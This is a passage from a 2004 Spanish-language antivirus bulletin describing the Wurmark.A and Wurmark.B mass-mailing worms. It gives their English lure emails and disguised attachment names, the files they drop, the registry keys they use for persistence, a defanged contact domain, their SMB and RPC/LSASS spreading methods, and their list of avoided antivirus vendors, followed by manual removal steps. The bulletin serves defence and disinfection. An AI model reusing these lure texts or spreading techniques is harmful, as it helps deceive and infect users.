  think out of 10 , dont worry if you dont like it
  just say i wont be offended p.s i was drunk when
  it was taken :P


  ------------------------------------------------------

  Current email was sent by an Evaluation License.
  Note: This footer will be removed with Licensed Version

Ejemplo 4:

  i found this on my computer from ages ago
  download it and see if you can remember it
  lol i was lauging like mad when i saw it! :D
  email me back haha...


  ------------------------------------------------------
  Current email was sent by an Evaluation License.
  Note: This footer will be removed with Licensed Version

Datos adjuntos: attached.zip

Este archivo contiene un ejecutable con alguno de los
siguientes nombres:

  admire_001.exe
  for_you.pif
  is_this_you.scr
  love_04.scr
  photo_01.pif
  pic_001.exe
  scan_04.scr
  sexy_09.scr

El gusano utiliza la librería SMTP estándar para enviar sus
mensajes. Estos, contienen el siguiente texto en sus
propiedades:

  X-Mailer: SMTP COMPONENT

La infección se produce cuando un usuario abre el adjunto
comprimido, y ejecuta su contenido.

Cuando ello ocurre, se muestra la imagen de un hombre haciendo
morisquetas.

  [ver imagen: http://www.vsantivirus.com/wurmark-a.htm]

En ese momento, el gusano crea los siguientes archivos en la
carpeta del sistema de Windows:

  c:\windows\system32\ansmtp.dll
  c:\windows\system32\attached.zip
  c:\windows\system32\bszip.dll
  c:\windows\system32\svkp.sys
  c:\windows\system32\uglym.jpg
  c:\windows\system32\winit.exe
  c:\windows\system32\xxz.tmp

Algunos de estos archivos (SVKP.SYS, WINIT.EXE), son troyanos.
ANSMTP.DLL es el motor SMTP estándar usado para el envío de
sus mensajes infectados. ATTACHED.ZIP es la copia comprimida
del gusano y XXZ.TMP es una copia del propio gusano. BSZIP.DLL
es un archivo usado para crear el .ZIP, y UGLYM.JPG es la
imagen mostrada.

Uno de los troyanos (detectado como Win32/Rbot.BPH por NOD32),
es ejecutado en cada reinicio del sistema, mediante la
siguiente clave agregada al registro:

  HKCU\Software\Microsoft\OLE
  virtual = winit.exe

  HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
  virtual = winit.exe

El gusano escanea la subred local (clase B), enviando paquetes
SYN al puerto TCP/445, en busca de equipos que respondan. El
troyano Win32/Rbot.BPH contiene código para explotar la
vulnerabilidad RPC/DCOM y también la que afecta al componente
LSASS. También se propaga por recursos compartidos (ADMIN$,
IPC$, C$, D$) aprovechándose de contraseñas de administrador
débiles.

Intenta conectarse al siguiente dominio:

  windowss .serveftp .com

El gusano puede propagarse a través de mensajes infectados
como los descriptos antes. Las direcciones a las que se envía,
son tomadas de archivos con las siguientes extensiones:

  .adb
  .asp
  .dbx
  .doc
  .htm
  .html
  .php
  .sht
  .tbb
  .txt
  .wab

Evita enviarse a aquellas direcciones que contengan cualquiera
de las siguientes cadenas en sus nombres:

  .gov
  adaware
  avguk
  grisoft
  kaspersky
  lavasoft
  mcafee
  nod32
  pandasoftware
  sophos
  sophos
  symantec
  trendmicro

Para el envío de estos mensajes, el gusano registra su propio
motor SMTP estándar. Para ello crea las siguientes entradas:

  HKCR\ANSMTP.MassSender
  HKCR\CLSID\{253664FB-EDFC-4AC6-BD69-B322F466AEED}
  HKCR\CLSID\{887A577B-406B-48FF-80CB-70752BFCD7B4}
  HKCR\Interface\{1E98666F-6260-42C9-B846-32B20FDEFE7B}
  HKCR\Interface\{A5F6C90C-ABE4-4C57-A421-8C5A202AA9F8}
  HKCR\Interface\{B13281CF-8778-4C98-AE23-ABBA4637A33D}

El troyano Win32/Rbot.BPH, también crea la siguiente entrada
en el registro cuando se ejecuta:

  HKLM\SYSTEM\CurrentControlSet\Services\SVKP
  HKCR\TypeLib\{DE6317F7-6EF0-45C2-88D1-8E09415817F1}

NOTA: "c:\windows\system32" puede variar de acuerdo al sistema
operativo instalado (con ese nombre por defecto en Windows XP
y Windows Server 2003, como "c:\winnt\system32" en Windows NT
y 2000 y "c:\windows\system" en Windows 9x y ME).


* Reparación manual

NOTA: Tenga en cuenta que de acuerdo a las acciones realizadas
por el atacante remoto, pueden aplicarse cambios en el sistema
no contemplados en esta descripción genérica.


* Sobre el componente troyano

Nota: Recomendamos utilizar un programa tipo firewall
(cortafuego) como el ZoneAlarm, el cuál detendrá y advertirá
la conexión de este y cualquier otro troyano con Internet, así
como cualquier intento de acceder a nuestro sistema.

ZoneAlarm (gratuito para su uso personal), además de ser un
excelente cortafuegos, también impide la ejecución de
cualquier adjunto con posibilidades de poseer virus (sin
necesidad de tener que actualizarlo con cada nueva versión de
un virus).

Más información:

Cómo configurar Zone Alarm 3.x
http://www.vsantivirus.com/za.htm


* Antivirus

Actualice sus antivirus con las últimas definiciones, luego
siga estos pasos:

1. Reinicie Windows en modo a prueba de fallos, como se indica
en este artículo:

  Cómo iniciar su computadora en Modo a prueba de fallos.
  http://www.vsantivirus.com/faq-modo-fallo.htm

2. Ejecute sus antivirus en modo escaneo, revisando todos sus
discos duros.

3. Borre los archivos detectados como infectados.


* Borrar manualmente archivos agregados por el virus

Desde el Explorador de Windows, localice y borre los
siguientes archivos:

  c:\windows\system32\ansmtp.dll
  c:\windows\system32\attached.zip
  c:\windows\system32\bszip.dll
  c:\windows\system32\svkp.sys
  c:\windows\system32\uglym.jpg
  c:\windows\system32\winit.exe
  c:\windows\system32\xxz.tmp

Haga clic con el botón derecho sobre el icono de la "Papelera
de reciclaje" en el escritorio, y seleccione "Vaciar la
papelera de reciclaje".


* Editar el registro

Nota: algunas de las ramas en el registro aquí mencionadas,
pueden no estar presentes ya que ello depende de que versión
de Windows se tenga instalada.

1. Ejecute el editor de registro: Inicio, ejecutar, escriba
REGEDIT y pulse ENTER

2. En el panel izquierdo del editor, haga clic en el signo "+"
hasta abrir la siguiente rama:

  HKEY_CLASSES_ROOT
  \ANSMTP.MassSender

3. Haga clic en la carpeta "ANSMTP.MassSender" y bórrela.

4. En el panel izquierdo del editor, haga clic en el signo "+"
hasta abrir la siguiente rama:

  HKEY_CLASSES_ROOT
  \CLSID

5. Haga clic en la carpeta "CLSID" y busque y borre las
siguientes carpetas:

  {253664FB-EDFC-4AC6-BD69-B322F466AEED}
  {887A577B-406B-48FF-80CB-70752BFCD7B4}

6. En el panel izquierdo del editor, haga clic en el signo "+"
hasta abrir la siguiente rama:

  HKEY_CLASSES_ROOT
  \Interface

7. Haga clic en la carpeta "Interface" y busque y borre las
siguientes carpetas:

  {1E98666F-6260-42C9-B846-32B20FDEFE7B}
  {A5F6C90C-ABE4-4C57-A421-8C5A202AA9F8}
  {B13281CF-8778-4C98-AE23-ABBA4637A33D}

8. En el panel izquierdo del editor, haga clic en el signo "+"
hasta abrir la siguiente rama:

  HKEY_CLASSES_ROOT
  \TypeLib
  \{DE6317F7-6EF0-45C2-88D1-8E09415817F1}

9. Haga clic en la carpeta "{DE6317F7-6EF0-45C2-88D1-
8E09415817F1}" y bórrela.

10. En el panel izquierdo del editor, haga clic en el signo
"+" hasta abrir la siguiente rama:

  HKEY_CURRENT_USER
  \Software
  \Microsoft
  \OLE

11. Haga clic en la carpeta "OLE" y en el panel de la derecha,
bajo la columna "Nombre", busque y borre la siguiente entrada:

  virtual = winit.exe

12. En el panel izquierdo del editor, haga clic en el signo
"+" hasta abrir la siguiente rama:

  HKEY_LOCAL_MACHINE
  \SOFTWARE
  \Microsoft
  \Windows
  \CurrentVersion
  \RunServices

13. Haga clic en la carpeta "RunServices" y en el panel de la
derecha, bajo la columna "Nombre", busque y borre la siguiente
entrada:

  virtual = winit.exe

14. En el panel izquierdo del editor, haga clic en el signo
"+" hasta abrir la siguiente rama:

  HKEY_LOCAL_MACHINE
  \SYSTEM
  \CurrentControlSet
  \Services
  \SVKP

15. Haga clic en la carpeta "SVKP" y bórrela.

16. Use "Registro", "Salir" para salir del editor y confirmar
los cambios.

17. Reinicie su computadora (Inicio, Apagar el sistema,
Reiniciar).


* Información adicional

* Activar el cortafuegos de Windows XP (Internet Conexión
Firewall, ICF)

Para activar ICF en Windows XP, siga estos pasos:

1. Seleccione Inicio, Panel de Control, Conexiones de Red (o
Conexiones de Red e Internet, Conexiones de Red).

2. Haga clic con el botón derecho sobre las distintas
conexiones disponibles para conectarse a Internet, y en
"Conexión de Red de Area Local" y seleccione Propiedades en
cada una de ellas.

3. En la lengüeta "Avanzadas" tilde la opción "Proteger mi
equipo y mi red limitando o impidiendo el acceso a él desde
Internet" en todos los casos.

4. Seleccione Aceptar, etc.


* Mostrar las extensiones verdaderas de los archivos

Para poder ver las extensiones verdaderas de los archivos y
además visualizar aquellos con atributos de "Oculto", proceda
así:

1. Ejecute el Explorador de Windows

2. Seleccione el menú 'Ver' (Windows 95/98/NT) o el menú
'Herramientas' (Windows Me/2000/XP), y haga clic en 'Opciones'
u 'Opciones de carpetas'.

3. Seleccione la lengüeta 'Ver'.

4. DESMARQUE la opción "Ocultar extensiones para los tipos de
archivos conocidos" o similar.

5. En Windows 95/NT, MARQUE la opción "Mostrar todos los
archivos y carpetas ocultos" o similar.

En Windows 98, bajo 'Archivos ocultos', MARQUE 'Mostrar todos
los archivos'.

En Windows Me/2000/XP, en 'Archivos y carpetas ocultos',
MARQUE 'Mostrar todos los archivos y carpetas ocultos' y
DESMARQUE 'Ocultar archivos protegidos del sistema operativo'.

6. Haga clic en 'Aplicar' y en 'Aceptar'.


* Limpieza de virus en Windows Me y XP

Si el sistema operativo instalado es Windows Me o Windows XP,
para poder eliminar correctamente este virus de su
computadora, deberá deshabilitar antes de cualquier acción, la
herramienta "Restaurar sistema" como se indica en estos
artículos:

Limpieza de virus en Windows Me
http://www.vsantivirus.com/faq-winme.htm

Limpieza de virus en Windows XP
http://www.vsantivirus.com/faq-winxp.htm


* Actualizaciones:

01/12/04 - 19:39 -0200 (Antes Mugly.A, ahora Wurmark.A)


(c) Video Soft - http://www.videosoft.net.uy
(c) VSAntivirus - http://www.vsantivirus.com
_____________________________________________________________

6 - W32/Wurmark.B. Datos adjuntos: ATTACHED.ZIP
_____________________________________________________________

http://www.vsantivirus.com/wurmark-b.htm

Nombre: W32/Wurmark.B
Nombre NOD32: Win32/Wurmark.A
Tipo: Gusano de Internet y caballo de Troya
Alias: Wurmark.B, Mugly.B, W32.Mugly.B@mm, W32/Mugly.B@mm,
W32/Mugly.b@MM, W32/Ugly.B@mm, Win32/Mugly.B, Win32/Wurmark.B,
Win32/Rbot.BPH
Fecha: 29/nov/04
Plataforma: Windows 32-bit
Tamaño: 423,814 bytes

Se han detectado al menos dos variantes de este gusano, que se
propaga en mensajes con las siguientes características:

De: [remitente falso]

Asunto: [uno de los siguientes]

  You have an Admirer
  Your Pic On A Website!!
  Rate My Pic.......
  Hhahahah lol!!!!

Texto del mensaje: [uno de los siguientes]

Ejemplo 1:

  Someone has asked us on there behalf to send
  you this email and tell you they think you are
  wonderfull!!! All the The mystery persons details
  you need are enclosed in the attachment :)
  please download and respond telling us if you
  would like to make further contact with this
  person.

  Regards Hallmark Admirer Mail Admin.

  ------------------------------------------------------
  Current email was sent by an Evaluation License.
  Note: This footer will be removed with Licensed Version

Ejemplo 2:

  I was looking at a website and came across
  this pic they look just like you! infact im sure
  it is lol , did you send this pic into them ? or
  is it someonce else :S ? Ive Added the pic in
  a zip so download it and check & email me back!


  ------------------------------------------------------

  Current email was sent by an Evaluation License.
  Note: This footer will be removed with Licensed
  Version

Ejemplo 3:

  Hi ive sent 5 emails now and nobody will rate
  my pic!! :( please download and tell me what you
  think out of 10 , dont worry if you dont like it
  just say i wont be offended p.s i was drunk when
  it was taken :P


  ------------------------------------------------------

  Current email was sent by an Evaluation License.
  Note: This footer will be removed with Licensed Version

Ejemplo 4:

  i found this on my computer from ages ago
  download it and see if you can remember it
  lol i was lauging like mad when i saw it! :D
  email me back haha...


  ------------------------------------------------------
  Current email was sent by an Evaluation License.
  Note: This footer will be removed with Licensed Version

Datos adjuntos: attached.zip

Este archivo contiene un ejecutable con alguno de los
siguientes nombres:

  admire_001.exe
  for_you.pif
  is_this_you.scr
  photo_01.pif
  pic_001.exe
  sexy_09.scr

El gusano utiliza la librería SMTP estándar para enviar sus
mensajes. Estos, contienen el siguiente texto en sus
propiedades:

  X-Mailer: SMTP COMPONENT

La infección se produce cuando un usuario abre el adjunto
comprimido, y ejecuta su contenido.

Cuando ello ocurre, se muestra la imagen de un hombre haciendo
morisquetas.

  [ver imagen: http://www.vsantivirus.com/wurmark-b.htm]

En ese momento, el gusano crea los siguientes archivos en la
carpeta del sistema de Windows:

  c:\windows\system32\ansmtp.dll
  c:\windows\system32\attached.zip
  c:\windows\system32\bszip.dll
  c:\windows\system32\svkp.sys
  c:\windows\system32\uglym.jpg
  c:\windows\system32\winit.exe
  c:\windows\system32\xxz.tmp

Algunos de estos archivos (SVKP.SYS, WINIT.EXE), son troyanos.
ANSMTP.DLL es el motor SMTP estándar usado para el envío de
sus mensajes infectados. ATTACHED.ZIP es la copia comprimida
del gusano y XXZ.TMP es una copia del propio gusano. BSZIP.DLL
es un archivo usado para crear el .ZIP, y UGLYM.JPG es la
imagen mostrada.

Uno de los troyanos (detectado como Win32/Rbot.BPH por NOD32),
es ejecutado en cada reinicio del sistema, mediante la
siguiente clave agregada al registro:

  HKCU\Software\Microsoft\OLE
  virtual = winit.exe

  HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
  virtual = winit.exe

El gusano escanea la subred local (clase B), enviando paquetes
SYN al puerto TCP/445, en busca de equipos que respondan. El
troyano Win32/Rbot.BPH contiene código para explotar la
vulnerabilidad RPC/DCOM y también la que afecta al componente
LSASS. También se propaga por recursos compartidos (ADMIN$,
IPC$, C$, D$) aprovechándose de contraseñas de administrador
débiles.

Intenta conectarse al siguiente dominio:

  windowss .serveftp .com

El gusano puede propagarse a través de mensajes infectados
como los descriptos antes. Las direcciones a las que se envía,
son tomadas de archivos con las siguientes extensiones:

  .adb
  .asp
  .dbx
  .doc
  .htm
  .html
  .php
  .sht
  .tbb
  .txt
  .wab

Evita enviarse a aquellas direcciones que contengan cualquiera
de las siguientes cadenas en sus nombres:

  .gov
  adaware
  avguk
  grisoft
  kaspersky
  lavasoft
  mcafee
  nod32
  pandasoftware
  sophos
  sophos
  symantec
  trendmicro

Para el envío de estos mensajes, el gusano registra su propio
motor SMTP estándar. Para ello crea las siguientes entradas:

  HKCR\ANSMTP.MassSender
  HKCR\CLSID\{253664FB-EDFC-4AC6-BD69-B322F466AEED}
  HKCR\CLSID\{887A577B-406B-48FF-80CB-70752BFCD7B4}
  HKCR\Interface\{1E98666F-6260-42C9-B846-32B20FDEFE7B}
  HKCR\Interface\{A5F6C90C-ABE4-4C57-A421-8C5A202AA9F8}
  HKCR\Interface\{B13281CF-8778-4C98-AE23-ABBA4637A33D}

El troyano Win32/Rbot.BPH, también crea la siguiente entrada
en el registro cuando se ejecuta:

  HKLM\SYSTEM\CurrentControlSet\Services\SVKP
  HKCR\TypeLib\{DE6317F7-6EF0-45C2-88D1-8E09415817F1}

NOTA: "c:\windows\system32" puede variar de acuerdo al sistema
operativo instalado (con ese nombre por defecto en Windows XP
y Windows Server 2003, como "c:\winnt\system32" en Windows NT
y 2000 y "c:\windows\system" en Windows 9x y ME).


* Reparación manual

NOTA: Tenga en cuenta que de acuerdo a las acciones realizadas
por el atacante remoto, pueden aplicarse cambios en el sistema
no contemplados en esta descripción genérica.


* Sobre el componente troyano

Nota: Recomendamos utilizar un programa tipo firewall
(cortafuego) como el ZoneAlarm, el cuál detendrá y advertirá
la conexión de este y cualquier otro troyano con Internet, así
como cualquier intento de acceder a nuestro sistema.

ZoneAlarm (gratuito para su uso personal), además de ser un
excelente cortafuegos, también impide la ejecución de
cualquier adjunto con posibilidades de poseer virus (sin
necesidad de tener que actualizarlo con cada nueva versión de
un virus).

Más información:

Cómo configurar Zone Alarm 3.x
http://www.vsantivirus.com/za.htm


* Antivirus

Actualice sus antivirus con las últimas definiciones, luego
siga estos pasos:

1. Reinicie Windows en modo a prueba de fallos, como se indica
en este artículo:

  Cómo iniciar su computadora en Modo a prueba de fallos.
  http://www.vsantivirus.com/faq-modo-fallo.htm

2. Ejecute sus antivirus en modo escaneo, revisando todos sus
discos duros.

3. Borre los archivos detectados como infectados.


* Borrar manualmente archivos agregados por el virus

Desde el Explorador de Windows, localice y borre los
siguientes archivos:

  c:\windows\system32\ansmtp.dll
  c:\windows\system32\attached.zip
  c:\windows\system32\bszip.dll
  c:\windows\system32\svkp.sys
  c:\windows\system32\uglym.jpg
  c:\windows\system32\winit.exe
  c:\windows\system32\xxz.tmp

Haga clic con el botón derecho sobre el icono de la "Papelera
de reciclaje" en el escritorio, y seleccione "Vaciar la
papelera de reciclaje".


* Editar el registro

Nota: algunas de las ramas en el registro aquí mencionadas,
pueden no estar presentes ya que ello depende de que versión
de Windows se tenga instalada.

1. Ejecute el editor de registro: Inicio, ejecutar, escriba
REGEDIT y pulse ENTER

2. En el panel izquierdo del editor, haga clic en el signo "+"
hasta abrir la siguiente rama:

  HKEY_CLASSES_ROOT
  \ANSMTP.MassSender

3. Haga clic en la carpeta "ANSMTP.MassSender" y bórrela.

4. En el panel izquierdo del editor, haga clic en el signo "+"
hasta abrir la siguiente rama:

  HKEY_CLASSES_ROOT
  \CLSID

5. Haga clic en la carpeta "CLSID" y busque y borre las
siguientes carpetas:

  {253664FB-EDFC-4AC6-BD69-B322F466AEED}
  {887A577B-406B-48FF-80CB-70752BFCD7B4}

6. En el panel izquierdo del editor, haga clic en el signo "+"
hasta abrir la siguiente rama:

  HKEY_CLASSES_ROOT
  \Interface

7. Haga clic en la carpeta "Interface" y busque y borre las
siguientes carpetas:

  {1E98666F-6260-42C9-B846-32B20FDEFE7B}
  {A5F6C90C-ABE4-4C57-A421-8C5A202AA9F8}
  {B13281CF-8778-4C98-AE23-ABBA4637A33D}

8. En el panel izquierdo del editor, haga clic en el signo "+"
hasta abrir la siguiente rama:

  HKEY_CLASSES_ROOT
  \TypeLib
  \{DE6317F7-6EF0-45C2-88D1-8E09415817F1}

9. Haga clic en la carpeta "{DE6317F7-6EF0-45C2-88D1-
8E09415817F1}" y bórrela.

10. En el panel izquierdo del editor, haga clic en el signo
"+" hasta abrir la siguiente rama:

  HKEY_CURRENT_USER
  \Software
  \Microsoft
  \OLE

11. Haga clic en la carpeta "OLE" y en el panel de la derecha,
bajo la columna "Nombre", busque y borre la siguiente entrada:

  virtual = winit.exe

12. En el panel izquierdo del editor, haga clic en el signo
"+" hasta abrir la siguiente rama:

  HKEY_LOCAL_MACHINE
  \SOFTWARE
  \Microsoft
  \Windows
  \CurrentVersion
  \RunServices

13. Haga clic en la carpeta "RunServices" y en el panel de la
derecha, bajo la columna "Nombre", busque y borre la siguiente
entrada:

  virtual = winit.exe

14. En el panel izquierdo del editor, haga clic en el signo
"+" hasta abrir la siguiente rama:

  HKEY_LOCAL_MACHINE
  \SYSTEM
  \CurrentControlSet
  \Services
  \SVKP

15. Haga clic en la carpeta "SVKP" y bórrela.

16. Use "Registro", "Salir" para salir del editor y confirmar
los cambios.

17. Reinicie su computadora (Inicio, Apagar el sistema,
Reiniciar).


* Información adicional

* Activar el cortafuegos de Windows XP (Internet Conexión
Firewall, ICF)

Para activar ICF en Windows XP, siga estos pasos:

1. Seleccione Inicio, Panel de Control, Conexiones de Red (o
Conexiones de Red e Internet, Conexiones de Red).

2. Haga clic con el botón derecho sobre las distintas
conexiones disponibles para conectarse a Internet, y en
"Conexión de Red de Area Local" y seleccione Propiedades en
cada una de ellas.

3. En la lengüeta "Avanzadas" tilde la opción "Proteger mi
equipo y mi red limitando o impidiendo el acceso a él desde
Internet" en todos los casos.

4. Seleccione Aceptar, etc.


* Mostrar las extensiones verdaderas de los archivos

Para poder ver las extensiones verdaderas de los archivos y
además visualizar aquellos con atributos de "Oculto", proceda
así:

1. Ejecute el Explorador de Windows

2. Seleccione el menú 'Ver' (Windows 95/98/NT) o el menú
'Herramientas' (Windows Me/2000/XP), y haga clic en 'Opciones'
u 'Opciones de carpetas'.

3. Seleccione la lengüeta 'Ver'.

4. DESMARQUE la opción "Ocultar extensiones para los tipos de
archivos conocidos" o similar.

5. En Windows 95/NT, MARQUE la opción "Mostrar todos los
archivos y carpetas ocultos" o similar.

En Windows 98, bajo 'Archivos ocultos', MARQUE 'Mostrar todos
los archivos'.

En Windows Me/2000/XP, en 'Archivos y carpetas ocultos',
MARQUE 'Mostrar todos los archivos y carpetas ocultos' y
DESMARQUE 'Ocultar archivos protegidos del sistema operativo'.

6. Haga clic en 'Aplicar' y en 'Aceptar'.


* Limpieza de virus en Windows Me y XP

Si el sistema operativo instalado es Windows Me o Windows XP,
para poder eliminar correctamente este virus de su
computadora, deberá deshabilitar antes de cualquier acción, la
herramienta "Restaurar sistema" como se indica en estos
artículos:

Limpieza de virus en Windows Me
http://www.vsantivirus.com/faq-winme.htm

Limpieza de virus en Windows XP
http://www.vsantivirus.com/faq-winxp.htm


* Actualizaciones:

01/12/04 - 19:39 -0200 (Antes Mugly.B, ahora Wurmark.B)


(c) Video Soft - http://www.videosoft.net.uy
(c) VSAntivirus - http://www.vsantivirus.com
_____________________________________________________________

Pautas generales para mantenerse alejado de los virus
_____________________________________________________________

Recuerde estas pautas para mantener alejado de su computadora
cualquier riesgo de virus o troyanos:

1) Use regularmente un programa antivirus (nosotros siempre
recomendamos no confiar en uno solo, pero usar más de uno no
significa que debamos tenerlos a todos instalados, simplemente
ejecutamos esos antivirus en su opción de escaneo, sobre la
carpeta que contenga los archivos a revisar). Y por supuesto,
de nada vale usar algún antivirus si no lo mantenemos
actualizado con los upgrades, updates o add-ons
correspondientes. Actualmente, las actualizaciones de la
mayoría de los fabricantes son diarias. No existen los "virus
demasiados nuevos y sin antídotos", la reacción de las casas
de antivirus es inmediata en todos los casos. Pero mejor
pregúntese, si la suya también lo es a la hora de
actualizarse.

2) No abrir ningún mensaje ni archivo recibido a través del
correo electrónico, que no haya sido solicitado, sin importar
su remitente. Ante cualquier duda, simplemente se debe optar
por borrar el mensaje (y archivos adjuntos). Como se dice
vulgarmente, "la confianza mata al hombre", en este caso a la
PC.

3) Estar informado de cómo operan los virus, y de las
novedades sobre estos, alertas y anuncios críticos, en sitios
como el nuestro.

4) No bajar nada de sitios Web de los que no tenga referencias
de seriedad, o que no sean medianamente conocidos. Y si se
bajan archivos, proceder como los archivos adjuntos. Copiarlos
a una carpeta y revisarlos con dos o tres antivirus
actualizados antes de optar por ejecutarlos o abrirlos.
_____________________________________________________________

Sobre este boletín
_____________________________________________________________

La distribución de este boletín es gratuita, y está amparada
bajo los derechos de Copyright registrados por Video Soft
(también los artículos publicados directamente en nuestra
página). Si usted desea usar esta información en cualquier
medio escrito o electrónico, puede hacerlo sin solicitarnos el
permiso respectivo, con la única condición de mencionar su
origen, y remitirnos un e-mail o ejemplar con la ubicación
donde se haga referencia al material usado que haya sido
sacado de este boletín o de la página de VSAntivirus.

Video Soft, Video Soft BBS, VSAntivirus y VSAyuda son marcas
registradas.

Los artículos de otros autores han sido incluidos de acuerdo a
la política de Copyright adoptada por cada uno de ellos, y su
inclusión en nuestro boletín se rige por dichas políticas, sin
embargo, para su uso en otro medio, se deberá solicitar la
debida autorización.
_____________________________________________________________

Video Soft es una empresa privada que desde hace más de 10
años se dedica a la seguridad informática, siendo líder en el
tema a través de su portal VSAntivirus, el cuál es visitado
diariamente por decenas de miles de usuarios de habla hispana
en todo el mundo. Desde julio de 2004, Video Soft representa
en Uruguay al antivirus NOD32 (marca registrada de ESET). Más
información: http://www.nod32.videosoft.net.uy/
_____________________________________________________________

Cualquier duda o comentario sobre esta lista de correo, envíe
un e-mail a cualquiera de estas direcciones:

jllopez@nativo.com
videosoft@videosoft.net.uy
_____________________________________________________________

VSANTIVIRUS - Sitio oficial: http://www.vsantivirus.com
_____________________________________________________________

Altas: http://listas.vsantivirus.com/lista/vsantivirus/alta
Bajas: http://listas.vsantivirus.com/lista/vsantivirus/baja

También puede enviar un mensaje vacío a estas direcciones:

Altas: vsantivirus-alta@listas.vsantivirus.com
Bajas: vsantivirus-baja@listas.vsantivirus.com
_____________________________________________________________

VSANTIVIRUS - http://www.vsantivirus.com - Es un servicio de
VIDEO SOFT (Maldonado, Uruguay) - http://www.videosoft.net.uy
_____________________________________________________________

VSantivirus No. 1609 Año 8, jueves 2 de diciembre de 2004


Sitio creado y diseñado por Video Soft
© 1996-2008

VSAntivirus y VSAyuda son servicios gratuitos de Video Soft Computación
Bergalli 462, Maldonado - Uruguay - Tel. 598 (42) 22 29 35